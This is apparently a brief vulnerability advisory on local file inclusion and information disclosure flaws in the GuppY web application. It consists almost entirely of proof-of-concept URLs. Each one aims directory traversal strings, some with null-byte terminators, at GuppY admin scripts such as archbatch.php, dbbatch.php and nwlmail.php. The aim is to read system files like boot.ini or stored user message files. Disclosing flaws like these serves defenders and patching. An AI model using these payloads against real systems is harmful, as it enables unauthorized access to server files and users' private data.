GuppY Multiple Local File Include and Information Disclosure Vulnerabilities

GuppY Multiple Local File Include and Information Disclosure Vulnerabilities

An exploit is not required.

The following proof of concept examples are available:
http://www.example.com/[path_to_guppy]/admin/editorTypetool.php?cmd=DIR&meskin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F

http://www.example.com/[path_to_guppy]/admin/inc/archbatch.php?lng=../../../../../../../../../../../boot.ini%00

http://www.example.com/[path_to_guppy]/admin/inc/dbbatch.php?lng=../../../../../../../../../../../

http://www.example.com/[path_to_guppy]/admin/inc/dbbatch.php?lng=../../../../../../../../../../../boot.ini%00

http://www.example.com/[path_to_guppy]/admin/inc/nwlmail.php?lng=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00

http://www.example.com/[path_to_guppy]/admin/inc/archbatch.php?lng=../../data/usermsg/username.dtb%00